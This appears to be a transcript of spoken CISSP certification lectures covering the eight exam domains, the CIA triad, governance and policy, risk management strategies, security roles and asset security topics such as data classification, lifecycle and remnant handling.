Governance is taken care of by the senior professionals of an organization. Next up, we have risk management. Here, the organization looks into mitigating all types of risks such as investment, physical, and cyber risks. Finally, we have compliance. As discussed previously, compliance refers to abiding by the defined laws and regulations. So who do you all think develops a security policy which is used to achieve the organization's goals? Well, it is done by the senior management of an organization. Let's have a look at the characteristics of these security policies. First and foremost, these policies should support the vision and mission of the company. All the business units should be integrated in these security policies. They should also be regularly updated. And finally, it is important that these security policies should be easy to understand so that everyone can abide by them without any problem. In addition to security policies, a risk analysis team is also formed in organization to perform the analysis of each known risk. There are various steps to perform risk analysis. Let's have a look at each of these. First, the team makes an assessment of the value of the company's assets. Then, there is an analysis made based on the risks to assets. And finally, the team discovers solutions to mitigate these risks. Now that was all about the first domain of CISSP, security and risk management. Let's have a look at the second domain, asset security. Asset security deals with the collection and protection of assets such as data and devices. Here, we will be looking into data classification, data management, data remnants, and data loss prevention. So in data classification, the data owner classifies data. A data owner can be an individual or a group of people who created the information and are directly responsible for it. This classification is done based on a set of predefined criteria. At the end, the classification is annually reviewed to see if there has to be some change incorporated. Data management involves managing the information lifecycle needs of an enterprise in an effective manner. It also ensures that the data complies to the set standards. And finally, data management also ensures data validity and integrity. Moving on to data remnants. It is a term used for the residual of digital data that is present even after trying to erase the data. Data remnants should be avoided as data should be completely destroyed. To tackle data remnants, we have methods like overwriting and destruction to name a few. In overwriting, other information is written over the data several times so that the original data cannot be recovered. In destruction, data in the storage device is physically damaged to make recovery difficult. Asset security also looks into data loss prevention. Here, several measures and risk assessments are performed to ensure that information is only available to authorized users. Let's now move on to our third domain, security engineering. As the name suggests, this domain talks about security architecture, security models, cryptography, and physical security. Security architecture establishes a common practice for creating, analyzing, and using architecture description within a particular domain. Security architecture takes the help of TCB, that is Trusted Computing Base, security perimeter, and reference models to implement security. Cryptography is also a part of security engineering. In cryptography, information is secured by converting data from a readable format to a non-readable format and vice versa. Moving to our fourth domain, we have communications and network security. This domain is all about network structures, transmission methods, and security measures used to achieve CIA in an organization. OSI model is the foundation of networking. This model, that is the Open Systems Interconnection Model, OSI model, describes how data is transferred from one computer to another. The OSI model consists of 7 layers, starting from physical layer, then data link layer, network layer, transport layer, session layer, presentation layer, and finally application layer. In the first layer, that is, physical layer transmits raw bit stream over the physical medium. Then data link layer defines the format of data on the network. Network layer provides logical addressing, and it also provides path determination using local addressing. The fourth layer, that is transport layer, provides end-to-end connections. In this layer, data is transmitted using transmission protocols including TCP and UDP. The session layer maintains connections, and it is also responsible for controlling ports and sessions. The sixth layer, that is the presentation layer, ensures that data is in a usable format. And finally, in the seventh layer, that is in the application layer, human-computer interaction happens. Here, applications can access the network services. The communications and network security domain also talks about firewalls. We can define a firewall as a hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer. Then we also have the IDS. IDS is known as the Intrusion Detection System. This is designed to detect unauthorized access to a system. IDS is used together with a firewall and a router. Moving to identity and access management, our fifth domain, let's have a look at what this domain is all about. This domain of CISSP is all about the access control, identification, authorization, and attacks on access control and its countermeasures. To be able to access a dataset or a resource, a subject has to be identified, authenticated, and authorized. Identity management, Kerberos, and access criteria are few of the crucial fields here. In identity management, through automated means, users are identified and authenticated. This domain also speaks of Kerberos, an authentication protocol that is based on symmetric key cryptography and provides end-to-end security. Access to data shouldn't be granted to anyone and everyone. In fact, it should be granted based on the level of trust and the job role in the organization. It is also better if it is provided based on the location and the time. Let's now have a look at our sixth domain, security assessment and testing. So in this domain, we will look into audits, security control assessment, and testing reports. As you might have heard of the term audit, it is nothing but a repeated process wherein an independent professional evaluates and analyzes evidence. Then we have vulnerability assessment, wherein IT risks are identified and evaluated. It helps in identifying, quantifying, and prioritizing vulnerabilities. A well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation. The assessment and test is executed by a working group called the Integrated Product Team. Testing is performed to check the data flow between the application and the system. Up next, we have the security operations domain. The seventh domain of CISSP is all about investigations, monitoring and logging, disaster recovery, and change management. Here, we will look into the fields of digital forensics, incident management, and perimeter security. Investigation of a computer crime is also known as computer forensics. In digital forensics, data is examined to identify, recover, and analyze opinions about digital information. Incident management works to restore the services to normal as soon as possible. A team called the Incident Response Team is deployed to handle such emergencies. Incident response is defined as a practice of detecting a problem, determining its cause, minimizing the damage, resolving the problem, and documenting each step. This team provides management with sufficient information and defends the company against future attacks. In perimeter security, there is perimeter defense, which allows us to detect and keep a check on unauthorized physical access. This field also controls the access to the facility. Moving on to our eighth and final domain, we have software development security. As the name suggests, this domain talks about security in a software development lifecycle. Here, we will be looking into topics like API, malware, spyware, adware, social engineering attacks, and SQL injection attack. Let's start off with the application program interface known as API. API is basically a collection of protocols and functions used to create applications. It supports formats such as representational state transfer REST and simple object access protocol. REST is nothing but using the present features of the web in a simple way. And SOAP, which is an acronym for Simple Object Access Protocol, is a messaging protocol for exchanging data among computers. Now let's move on to malware as a security threat. Malware is a term which refers to malicious software, viruses, ransomware, and worms. We can also call Trojan virus as a form of malware which is capable of disguising itself as a legitimate software. Malware is basically a broad term that refers to a variety of malicious programs. One way to protect your software from malware is to always double-check your downloads. Moving on to our next security threat, spyware. As the name suggests, this is a software that typically spies on your system. Spyware is also a type of malware which is used to secretly gather information of the victim to give it to a third party. Those programs that secretly record all that you do on your computer are called spyware. It is always advised to turn on pop-up blockers to prevent spyware. Next up, we have adware. Adware is also known as advertising supported software. It is a type of malware that constantly displays ads and pop-ups. Some of such ads can also gather your information. At times, adware is not all that dangerous, but it is a hassle as it is a gateway to unwanted advertising on the screen, and it can also change the browser homepage. Adwares are known to display unwanted, annoying advertisements on your screens. Let's now have a look at social engineering attacks. It is basically the art of manipulating people so that they end up giving their confidential information. This attack lures victims into handing over their confidential data. This attack takes place by tricking the human mind. The most common social engineering attacks are phishing, spear phishing, and mailing phishing attack. Phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source. This is done to install malware or to steal sensitive data like credit card information and various other login credentials. Spear phishing attack is a variation of phishing. Here, the attacker targets a specific individual or a group of people. And in whaling phishing attack, wealthy, powerful, and prominent individuals are made targets. Moving on to our next attack, we have SQL injection attack. SQL injection attack is a type of code injection attack. In a database-driven website, the hacker manipulates a standard SQL query. It allows attackers to tamper with the existing data. Here, malicious code is inserted into the SQL server to obtain information.
So, in CISSP, as with every security course, we start off with the CIA triad. Now here, CIA is confidentiality, integrity, and availability. So, it starts off with every security mechanism. When we talk about security and we want to keep things secure, what is it that we want to secure? It is the data of an organization that is the most valuable asset to the organization, and that's what we want to secure. When we say that we want the data to be secured, we basically talk about three aspects for that data. The first and the foremost, that the data needs to remain confidential. The second aspect, that the data needs to be trustworthy. And the third concept, that the data should be available to all authorized users when and where they require it. So going back to the first point, when we say we want data to be confidential, what do we mean by that? By confidentiality, we talk about that data being made available only to authorized users after you have authenticated them, ensured or assured of their authenticity, and only then you're going to give access to that data, right? So even if you go into an organization has a hierarchy of governance, right? So only certain people with certain clearances or certain job titles can have access to certain amount of data, whereas other people may not have access to it. For example, a person working in the sales department will not have access to data that is accessed by the HR department. Thus, that's what we are looking at: classification of data and keeping it confidential, only making it available to those people who require it. When we say trustworthiness or the integrity of that data, the integrity is where the data has been altered, modified, removed, deleted by unauthorized people. So we want to prevent that, which means when we say we want the integrity intact, we want to ensure that only authorized people can modify, alter, or remove data if they are allowed to do so. So that's where the authorization and authentication comes into the picture again. And data needs to be available. For me to safeguard data, I can just lock it up in a safe, throw the safe in the depth of an ocean, and say that the data is secure because it cannot be leaked out. But that data is no longer available to authorized users, hence that data is useless. For me, data would have value when the data remains confidential, has its trustworthiness intact, and is still available to all the users that are authorized to access it. So when we talk about security, we want these three aspects to be implemented on any and every digital asset that the organization has, and thus once these 3 points are guaranteed or at least assured to a certain extent, we can then say that the data or that particular asset is secured. Moving on, let's talk about information security. Information security is the process of protecting data and information systems. So in the CIA, as we talked about it, when we said what do we want to protect, we want to protect all the information assets or the technical assets that we have from any of the vulnerabilities that can be identified. So we want to restrict unauthorized access and use. We want to restrict deletion, accidental or intentional if they have not been authorized to do so, modification of data, so the integrity part, and destruction of data. Destruction could not only be deleting data, but it could be something like a ransomware where the data gets encrypted, so it's still there, it's just not accessible to you. Now, information security ensures the implementation of these following aspects. The first and foremost comes from information security policies, which is the governance aspect of it. The policies are designed to have a implementation of security in an organization that helps the business processes to be executed in a secure manner. Where are these policies coming from? They come from standards or guidelines which are globally available and based on which we can start developing our security policies. For example, if I want to develop a security policy in my organization, I might want to depend on frameworks like ISO 27001, COBIT, or something similar. Once I have these standards set, I would come back to procedures. Procedures being how are these standards to be executed, right? For example, in my policies, I ensured that I want encryption of AES 256 to be implemented, or rather in the policy, I determined that we want encryption to be implemented on a data set based on the classification of those data. So in my policies, I would determine how the classification is going to work, how data is going to be classified on what parameters, and thus once the data gets classified, we are going to come back to standards where we say if it is classified as confidential data, we want to use encryption to protect that data, and we want AES 256 to be utilized for encryption. So how do we go about it? How do we implement the encryption? That's where your procedures come into the picture. Your guidelines are troubleshooting mechanisms, optional documents. So if somebody has trouble following the procedures, they might want to go into the guidelines and see how to troubleshoot the scenario that they are facing. Baselines are basically the minimum achievable target that you want to go with these policies. So let's say when I say I want to have a baseline on a server where for the server to be published onto the internet or to be used in production environment, it has to meet a certain criteria, which means I can go back to the hardware and I can say the server needs a hardware configuration of X, Y, and Z. Let's say a Xeon processor with 16 cores, 128 gigs of RAM. So that's a baseline that I need for a particular server for it to be put into production environment for a particular use. Anything above that is acceptable, but nothing should go below that. Then comes the risk management. While we are implementing these policies, procedures, we have those standards in place. If we face any risk during that period, or if we face any threat or a vulnerability is identified during this period, all these terms we are going to discuss in a little bit. So when we identify vulnerabilities or threats, that's where our risks come into the picture. The risk management comes in saying, okay, this is a risk that we have identified, and now how do we want to mitigate the risk? Then the security organization comes into the picture, the day-to-day activity of how security is to be implemented. And for all of these procedures, policies, baselines, standards to be implemented, to be ensured that to be assured that they are working properly, we need to make our employees aware that these policies exist. This is something that they need to follow. Thus, the awareness or the security education comes into the picture. Here, the security education is more focused on helping employees adhere to the company policies and standards rather than educating employees about security. We don't want to make everybody an ethical hacker. We just want to ensure them or we want to assure the organization that everybody has been warned about policies, procedures, security requirements, and they are going to follow those requirements. For example, a password policy where you have to adhere to a specific password policy to ensure passwords are created. At the same time, there is another password policy which says that you should not share passwords with your colleagues no matter what. So for me, for my employees to follow that, I need to make them aware that these policies exist and there are repercussions if they do not follow these particular policies. So coming back to the governance part, what is governance since we have been talking about it? Governance ensures that the security strategies are aligned with business objectives and consistent with regulations. So what does it guarantee? Appropriate information security activities are being performed. Based on what? Based on the policies that we have created, based on the standards that we have and the baselines that we would have created. So security has to be comparable, right? So if I say I have secured against particular attacks, the attacks have to be identified and then compared to those particular attacks, I can say I have mitigated these activities by having specific security controls. Thus, I can say that I am secure. The governance aspects keeps a watch on all these security controls to see that those security activities are ensured, are being implemented, and are performing to the best of their abilities. That's where your governance comes into the picture. The risks being reduced, so the risk management also comes under the governance, where you're looking at newly identified risks and you're then implementing security controls that would mitigate these risks. Then we are looking at information security investments appropriately directed. So when I say I want a security control, which would be a firewall, IDS, IPS, antiviruses, whatever is required, it needs to have a return on investment which is acceptable for the organization. You don't want to spend up too much of money in security, thus creating losses for the organization. When you say a business objective is always to make money rather than lose money. So security should be a supporting feature to the business objectives, where the services are being provided by the business in a secure manner in such a way that they can still have a positive return on investment on the services that are being provided. And the executive management can determine the program's effectiveness. This is the major part, because we have to, even in any compliances, audits, technical audits, we have to prove that whatever we have implemented actually works, is effective, thus mitigating the risk. If your security controls are not effective, then you have just wasted a bucket load of money and have not achieved any security measures in your exercise. Moving on to security controls. Security controls are measures taken to safeguard an information system from an attack, basically for the CIA triad, the confidentiality, integrity, and availability. So security controls could be administrative controls, technical controls, or physical security controls. What are administrative security controls? They would be policies, procedures that we have in place. So the password policy becomes an administrative control where the management has made everybody aware that the password needs to meet a particular complexity, should not be shared, and thus becomes an administrative security control. A technical security control would be where we are implementing this policy, and thus when I try to create a password, there is a software that maps the password to the complexity requirements, assures or ensures that the complexity requirements have been met, and thus allows the password to be accepted or rejects the password as the case may be. That is a security control. A physical security control may be, let's say, a CCTV camera which you're going to use to monitor people and ensure that nothing untoward happens. It's not only against physical crime, but let's say access to a particular room where nobody is seen tailgating. Maybe monitoring a server room which is very well secured and ensuring that unauthorized people do not get access or purposefully or intently do not access that area at all times. So these are the three levels of security controls that can be implemented to enhance the security of an organization. Then we come to security policies. Policies is an overall broad statement produced by a senior management that dictates the role of security within the organization. For example, the password policy that we talked about, it just said that it needs to meet a certain complexity, which is a broad statement that is being made by the management saying we want to adhere to this policy to ensure that we do not get hacked by brute force attacks or dictionary attacks or whatever it is. The broad statement is trying to prevent certain attacks from happening on the organization. How it is implemented, that's where the procedures and everything else comes into the picture. It must integrate security into all business processes. So if I start creating a policy which ensures that the complexity should be so high that the password should be at least 20 characters strong, that would be detrimental to the organization's health because people may not remember those passwords, or resetting those passwords, or having technical mechanisms, technical security controls in place to implement that kind of stringent security may be too expensive to have. So whatever policies are created, they need to be in line with the business processes as well. The policy must be reviewed and modified periodically or as company changes. So as and when the company becomes more mature and can have more levels of security, they must look at their policies again and redefine them. Or as a company grows or changes market scenarios or changes business processes, these policies may become redundant. So you want to look at those policies and implement newer policies or modify the existing policies to suit the business processes in a better manner. It must support vision and mission of the organization. A business once established will always have a long-term vision. For example, the e-tailer example that we are talking about, for me to open an e-retailing website, I don't want it to be periodic. I don't want it to be for a month or something like that. I want to achieve success in that factor, and I want to create a plan of where I want to reach, let's say in the next 5 years. So how do I achieve that? That's something that I need to plan as a business plan. All my security mechanisms that are in place should be in alignment with the business plans, business visions across the number of years that we have envisaged the business to perform. So that's where the policies come into the picture. Policies are always long-term, not short-term documents, but need to be periodically reviewed and modified as the business grows or business changes its posture. Then looking at compliance. Compliance means conforming to a rule such as a specification, policy, standard, or law. So we have looked at compliance from a perspective where we talked about ISO 27001 or PCI DSS or those frameworks. Now these are not laws, but these are standards or frameworks that have been created over a period of time through experience. And these are targeted towards organizations, towards specific industries. For example, PCI DSS is only towards finance organizations where they have payment gateways in place. The ISO 27001 is a more generic policy which can be implemented by various organizations. HIPAA, Health Insurance Portability and Accountability Act, is an American act that talks about health-related data of its citizens. So these are compliances. These may not be laws, but you need to adhere to these to be effective and to be allowed to conduct business in that particular industry. Then we have Code of Ethics. Code of Ethics state safety of the Commonwealth, duty to our principles and to each other requires that we adhere and be seen to adhere to the highest ethical standards of behavior. Therefore, strict adherence to this code is a condition of certification. What are the ethics? Protect society, the Commonwealth and the infrastructure, act honorably, honestly, justly, responsibility and legally, prove diligent and competent service to the principles, advance and profession. Now, the Code of Ethics are codes created by ISC Square for the CISSP professional, and you need to adhere to these codes. If they identify violation of these codes from any member, they would debar the member, strip them of the certification, and even blacklist them based on whatever ethics they have violated. So even before the exam, you have to go through the Code of Ethics. You have to accept the Code of Ethics. In the exam, you may get up to 5 to 6 questions just on Code of Ethics. Then comes the legal systems. That's where the law comes into the picture. Law could differ from country to country or from region to region, and thus, depending on which country you are in, you may need to be aware of those laws of those countries. As far as CISSP is concerned, ISC Square is concerned, they are an American organization, so they would talk about mostly American laws and a few European laws or directives as well. So there are 3 different laws that we talk about: civil, common, and religious laws. Depends on the country, the culture of that particular country. The information security professional should understand the different legal systems followed internationally. So you also may come across the classification as civil law, criminal law, and law of torts. Civil law is basically a law where, let's say, a contract has been breached and it's not criminal in nature. You just want to sue an organization for breach of contract. Criminal law is where something criminal has happened under the particular act of that particular country, like let's say a murder or an attack that has happened, a physical attack, or something got stolen. And the third one was the law of torts, where it's more of a compensatory law where you can file a case, a civil suit, demand compensation in lieu of the wrongs that have happened to that particular organization or that individual. Then comes the personal security. The people inside the organization need access to data to complete their assigned work and hence have the potential to misuse these privileges. And thus, you should have personnel security as well. Now, when we talk about hiring practices for people, most of the organizations perform background checks, and we get confused why these background checks are being done. The background checks are essential to the health of the organization, where you are ensuring that the person is not a malicious person, has the prerequisite certifications or the qualifications, have never been debarred or have never been prosecuted, do not have a criminal background, thus preventing physical attacks on the organization. For example, a competitor may attempt to place in your organization a spy to gather information on the secrets of that organization and report it back to the competitor. A background check may reveal that this person was previously employed by a competitor, and thus you might want to verify that how that employment got terminated, when did it get terminated, or is this person misusing anything or misrepresenting any aspect of his or their life. Then you also need to get confidentiality agreements signed with them. For example, NDAs, non-disclosure agreements, data that is being shared with them, the ownership of that particular data, and what are the repercussions if that confidentiality is breached by that particular person. Conflict of interest agreements for positions handling competitive information. As you go higher up in the organization, you might come across contracts where it prohibits a particular person in engaging into the same activity with a competitor for a particular period of time. So if there is a conflict of interest when you're hiring a person where they have signed such a agreement with another competitor or another organization, you don't want to embroil yourself in a lawsuit where the other organization may sue you for hiring a person while they were still under that particular contract. So it's not only to look at the background of these people, but to safeguard the organization from any lawsuits or any violations of contract as well. Get the non-compete agreements for the positions in charge of unique corporate processes. That again goes on to say if you're going to leave the organization, you cannot start up a competing business similar to the organization's business, and so on and so forth. Now let's come back to the technical aspect and start talking about vulnerability, threats, and risk. Now, what is a vulnerability? It is nothing but a weakness in a system or a process, implies the absence of a countermeasure. Vulnerability is internal and is more easily managed. So it's basically a flaw or a misconfiguration or a design flaw or something like using defaults, username, passwords, configurations, where if that particular flaw is misused, it will lead into a security event on that particular device for that particular organization. So when we say a security event, it has to be detrimental in nature. So if somebody is using a weak password that can easily be cracked, that is a vulnerability where you have identified a weak password, and then you want to prevent that vulnerability by imposing a security control or a countermeasure. The security control here starts off with the policy of having a robust security policy where a password policy comes in that describes the complexity of a particular password. And then you talk about a technical countermeasure where you have implemented an identity and access management plan, which would ensure that the person creating that password adheres to the complexity of that particular policy. Then a threat. The threat is the possibility that the vulnerability might be exploited, which will result in loss. So if somebody has created a weak password and it has been allowed, that's a vulnerability which can be exploited by the usage of brute force attacks or dictionary-based attacks to crack passwords. If the password is cracked, somebody unauthorized may get access to that data, thus resulting in a loss for that organization. So the threat is the possibility of that particular vulnerability being exploited. And then comes the risk. The risk is basically the likelihood of that attack being happened. So I have a weak password. It can be exploited by a brute force or dictionary attack. The likelihood of that attack is what determines the risk level for me. Now the likelihood will always be hypothetical, but we don't want to run helter-skelter and we do not want to take the possibility to extreme. So that's where your business processes come into the picture. Your security policies come into the picture. Based on the business processes and the policies implemented, if I have a weak password, what would be the loss that I would face for that particular person? For example, a fresher coming into an organization having a weak password but having limited access to data would have a lesser risk because of the loss being lesser than a CEO of an organization using a weak password and thus getting exploited, because the CEO will have access to more proprietary data that if gets into the competitor's hand would lead in huge losses. Thus, the same risk of having a password cracked for a fresher will have a lesser loss, thus a lesser risk compared to the same risk to a CEO where the loss would be higher. So a threat could also be in multiple aspects. Threats could be natural, that means to fires, flooding, tornadoes, anything that is an act of God that can happen with minimal human interaction. Or the second threat would be man-made, where man is responsible for it, like theft, hacking, rioting, war, anything that is created by a man, or rather humans. And technical in nature, could be software bugs where vulnerabilities are created, or server failures where something technical has gone wrong and you need a technical skilled person to come in and repair that particular aspect. Then the fourth one would be a supply system failure or a chain supply failure where you have dependencies. For example, any organization will have a dependency on an electricity service provider where they are providing electricity as a service which powers on the IT infrastructure. If the service provider fails and there is an electricity or a power cut, your systems are not going to work. Thus, you need a secondary mechanism to prevent that threat from being realized. Once we have identified these threats we have identified these vulnerabilities and we have identified the likelihood and the probability of that attack, that's where we come across the risk management exercise. Now, what is risk management? Risk management is a hypothetical exercise where we have identified a vulnerability, we have looked at the threat that it may have, and the likelihood of that threat being realized. Once we have identified the threat, the risk level, that's where the risk management comes into the picture. Reading from the slides, a core component of enterprise security program. Why? Because we need a baseline and we compare security to a baseline. For example, I've got a firewall that has been configured in a particular manner. Now, when I do a vulnerability assessment on the firewall, the vulnerability assessment gives me a report that states that some of the rules may now be redundant, thus allowing access to unauthorized users. This becomes a risk, or this becomes a threat. If this threat is identified by unauthorized people, they would then try to attack this firewall to gain access to that data which they are unauthorized to access, thus leading to losses for an organization. What is the likelihood of this happening? If the likelihood is high or low, that's what the risk management program is all about, right? And based on these risks, we implement security controls, we manage the security controls, and then we verify the security controls for future risks to coming into the picture. It must be defined, and it is always defined as an ongoing project, because risks will always change based on the businesses, based on the security controls that you have. This will give a guidance to an organization of how security is being implemented, how it has enhanced over a period of time, and how security mature that organization has become because of the risk assessment program. It also helps you to satisfy two aspects: due diligence and due care. What is due diligence? Due diligence is basically the research that organization does in identifying those risks and mitigating them. The due care is the actual part of mitigation where you have implemented a security control to mitigate the risk that you have identified. So if company is negligent, that means if the company doesn't have a risk management program, it is not going to be that security oriented, or the security is not going to be that great. Thus, the company may not comply to laws, regulations, and standards, thus causing them penalties, lawsuits, and other repercussions in the industry based on whatever they are doing. For risk management, we come to frameworks. The frameworks are used to categorize information systems so that we can identify threats or risks based on the classification. So this classification helps us determine the criticality and the sensitivity of information system, right? So what is the sensitivity and criticality? It basically gives us an understanding of the value of the asset that we have. So if you go back to domain 1, the asset value or the asset identification, asset security, that's where it comes into the picture. Obviously, a database server is going to be more secure than an end user laptop based on the data that they have. Thus, the criticality of the system for a database is much higher than an end user's laptop. Then we look at the security controls that can be implemented. Then for those, the frameworks like ISO 27001 comes into the picture. There is COBIT, there are a lot of frameworks out there, NIST 800-53. Then we talk about assessing the security controls. Once we have placed those security controls, we need to verify those controls are placed properly. They actually mitigate the risk and are appropriate to correctly mitigate that particular risk that they are created. Then looking at authorizing information systems, grant information systems operations based on risks determined. So you have identified risks, you have authorizing some of them, some of the devices to function in a particular manner based on which some of those risks would be mitigated or would be reduced to an acceptable level. So in the CISSP, we talk about a lot of risk assessment strategies. We look at how we can manage risks. The 4 different types of managing risks would be: one is to mitigate, other is to transfer, the third is to accept it, and the fourth one is to neglect the risk. So in the CISSP, it talks in great details about those risk assessment strategies. We are talking about the 4 types of risk mitigating strategies. They are risk avoiding or avoiding the risks, accepting the risk, transferring the risk, and limiting the risk. So in the course, we basically talk about a lot of risk strategies and how to mitigate these risks and how they can be implemented to bring down to an acceptable level. So again, risk acceptance, risk appetite of an organization comes into the picture. These terms are then discussed in the training to understand how the policies would work around the risk management strategy. Moving on, then looking at monitoring security controls. So once we have security controls in place, we have assessed them, we also need to monitor them for the effectiveness, and though they are going to create any alerts or any risks are being realized or any new risk that may be created by the security control implementation. So in these risk assessment, these are the frameworks, these are the steps that we want to follow to identify, mitigate, and monitor these risks. So the management begins with risk assessment. What do you mean by risk assessment? Identifying the impact of the risk that the risk would have on the organization. And there would be two different ways to assess the risk: a quantitative assessment or a qualitative assessment. A quantitative assessment is more quantifiable or is numerical in its process, where you're looking at assigning costs to particular assets and the threats. So the losses that you may figure out in a risk assessment strategy would be more numerical, where would be in a currency format, where let's say a risk, if realized, would lead to a loss of a X amount of dollars. That's where the quantitative analysis comes into the picture. The qualitative analysis would be quality of a service. So if a service is being affected because of a risk, what is the degradation of that service? To what aspect is it getting degraded? For example, internet that we use. If there is an internet outage or if there is a reduction in internet speed, right? So if I've got a 10 Mbps line and now because of some fault of the ISP, it gets reduced to 4 Mbps, I may not be able to conduct the business that I was doing on a 10 Mbps line. Thus the quality of that device has degraded. Thus it is a risk and it is causing me losses, right? So qualitative risk analysis would be more descriptive in nature rather than be numerical in nature. Most of the companies or organizations would follow a hybrid policy because it is not possible to have a quantitative risk analysis in each and every scenario. Newer organization which doesn't have much data to rely on, historical data of how threats have affected that particular organization, may go in for a qualitative one, and as they mature over time in the security practices, they may then turn over to a quantitative risk analysis or a hybrid risk analysis where they're using a combination of quantitative and qualitative both. Thus, the risk controls that we were talking about: risk acceptance, risk reduction, and risk assignment. There is risk avoidance as well. So there are 4 controls. The risk reduction is where you have implemented a security control based on which the risk has been reduced to a more acceptable level. Risk assignment is where you're also known as risk avoidance. That's where you're avoiding risk by outsourcing it. So talking about risk controls again, the 4 types being accept, avoid, transfer, and reduce. Risk acceptance is where the organization is willingly accepting the risk as the way it is because they don't want to deal with it right now. They might deal with it in the next iteration, or it is at an acceptable level and the company just wants to move on. Avoiding the risk is where you are going to try to not use the service where the risk exists. Thus, avoiding is where you have identified a particular service where the risk exists and now you're not using the service to avoid the risk altogether. Risk limitation or risk reduction would be where you are implementing a security control to mitigate the risk. And then risk transference is where risk assignment comes into the picture, where you are transferring it to a third party, like outsourcing it by using insurance to limit the risk. So for example, the threat is of a fire, the risk is high, but you cannot do anything about it. So you purchase insurance. So if the fire actually happens, you would still be reimbursed for the losses that you have faced. Coming back to countermeasures, we have discussed administrative countermeasures. These are policies, rules, regulations, laws, customs that a company needs to adhere to based on the industry that they are in. Then there are technical controls, software controls, anything that is technical in nature, IDS, IPS, firewalls, encryption, anything that is going to help you implement the CIA. And then physical, where you would look at locks on doors, security guards at fences, where they're preventing access to unauthorized people. Let's talk about roles and responsibilities of management. Now, as far as management is concerned, or the hierarchy is concerned, you can see on the screen there's a senior management, a security professional, data owner, custodian, and user. Now, these are from exam perspective, from the certification perspective. Obviously, the hierarchy in an organization would be slightly different. But here the senior management is the responsible party for the entire security mechanism. So they must drive the entire security program. So CISSP talks about a top-down approach where the senior management has realized the importance of security and is implementing at all levels within the organization. Thus, they are a part of it and they are supporting the security program. They define the tolerance of risk of how much risk is to be tolerated by an organization from a monetary perspective or the qualitative perspective as well, depending on the laws, legislations, regulations, compliances, and the contracts that the business has signed. They will rely on security professionals to manage the risk, but the exercise and the management process has to be defined by the senior management. Once the security team comes up with the countermeasures, the senior management either approves or disapproves them based on the return on investment of that countermeasure. The security professional assists with the development of policy documents, gives their inputs because they are the people who are in the day-to-day process of dealing with these. Thus, they can identify gaps and give good inputs to modify or to create the policy in a more robust manner. The security professionals may be a part of the risk assessment and risk management team as well, especially the security technical aspects of it, assist with the implementation and maintenance of countermeasures. So the administrative, technical, or physical measures that you have identified, you may be requested to implement that. For example, the locks that we have on the door, the swipe locks, they are connected to a database where the database is maintained. So as a security professional, you wouldn't be responsible to fit those locks, but to create the database, manage and maintain the database where that information is kept upon, where people are authorized and authenticated, and would be responsible for monitoring, auditing, and security assessments as well. The data owner, the owner of that particular data part, would normally be the head of the department. For example, the sales data is normally owned by the director of sales of that department, so that they would be ultimately responsible for identifying that data, classifying that data, and accepting the security controls that are implemented. They may request for additional security controls if they deem fit. The security professional implements these security controls. Then the custodian, a person who is responsible for implementing the approved security controls or managing the day-to-day activity of the security controls. For example, the security professional has identified an access control to be implemented on a data set that the data owner owns. The data owner has approved of it. It is the custodian who is going to implement that strategy or implement the control on it. The user is basically the user who or the person who accesses the information and IT resources, does whatever access controls have been implemented, would identify the user, authenticate, authorize them, and hold them accountable for whatever they are doing. If the user is unable to authenticate, access would be denied.
We will focus on the second domain of CISSP, which is asset security. So let's understand the need for asset security through a small scenario. Well, it was yet another regular day in Tim's organization. Everything was going on fine until the organization faced a cyber attack. The hacker hacked all the servers in Tim's organization. The organization had loads of data. Not all of the data had the same level of protection. The level of protection varied from one piece of information to another. In this scenario, the hacker could hack into only that particular data which was less protected. However, this cyber attack had a huge impact on the organization. In addition to this, it was also discovered that there was some flaw in the information classification process that exposed even sensitive data to a cyber attack. In other words, even crucial data was left with very less protection. This gave rise to asset security. Asset security is defined as the process of collecting and protecting assets such as data and devices. Asset security helps an organization understand and classify data with respect to its importance, which in turn makes sure that highly valuable data receives the most protection. Asset security achieves its goals through its domains. The domains are information classification, then we have data classification, data lifecycle, data remnants, and finally we have data loss prevention. Each of these domains have different goals. All of these domains together make up asset security. Now let's have a look at each of these domains individually. First up, we have information classification. As you saw what happened in Tim's organization, it is understood that importance of data varies largely. We have to classify data before we can move on to protecting it. We need to be able to identify which is the most crucial data with respect to our organizations. Information classification is defined as the process of segregating data based on its importance to provide adequate level of protection to every piece of data. Information classification is different for each sector. Based on their objectives, the classification varies. In the general sector, information classification is used to minimize risks on crucial information, whereas in the government or military sector, it is used to prevent unauthorized access. And finally, in the commercial sector, it is used to keep sensitive information private. Here, it is seen to it that information is not disclosed to a company's competitors. Let's now move on to our second domain, that is data classification. As the name suggests, here data is basically classified based on a set of considerations. Here we will look into factors like data retention requirements, then data security requirements, data disposal methods, data encryption requirements, and finally compliance requirements. So these are the factors which are taken into consideration while classifying data. This entire process of data classification is taken care of by the data owner. In addition to the classification, they also analyze the use and value of the available data to the company. Finally, the data owner also annually reviews the data classification. Before classifying data, an important step is to understand the data life cycle. All of us speak of data all the time. However, do we know the various steps a piece of data goes through? Well, for that, let us have a look at the third domain, data life cycle. We will start off from the data creation step and understand what happens to the data after that. As you see on your screens, we have 6 steps in the data lifecycle stage. They are create, store, use, share, archive, and destroy. Starting off with the create phase. This is the first step in data lifecycle. Here, new data is generated or the existing data is updated. After the data is created, we use data repositories to store the created data. Without storing data, we cannot derive any information from it. Hence, this step is very crucial. In the third phase, data is viewed or used in some application or processed. In addition to data being viewed and processed, it is also shared between various users and customers. Our fifth phase is archive. Here, data which is not used frequently, that is, inactive data, is identified and then moved into long-term storage systems. And finally, we have the destroy phase. As the name suggests, data is simply destroyed here. Data can be destroyed either digitally or physically. Not to forget, you cannot simply destroy data. It should be done based on regulations. But have you wondered what happens if data is not destroyed even after we try our best to erase it? Well, this gives rise to data remnants. In simple words, data remnants is a term used for the residual of digital data which remains even after attempting to erase that particular data. Data remnants should be avoided as it is not good to have remains of a piece of data which was intended to be destroyed. Security professionals should be well versed with techniques to avoid data remnants. So how do we tackle data remnants? For this, we have various methods. They are purging, clearing, overwriting, degaussing, storing, and finally destruction. Let's have a look at each of these methods individually and understand how they help in tackling data remnants. First up, we have purging. Purging is done to minimize risks on crucial information. In clearing, data from storage devices are removed. However, it can be reconstructed by using various softwares. Third, we have overwriting. Here, we write over the original data several times so that the original data cannot be recovered. Degaussing is the method used to destroy data on magnetic storage tapes. Next up, we have storing. Before storing data on media, the data is encrypted for the purpose of safety. Finally, the sixth method is destruction. Here, storage devices which hold the data are physically damaged. 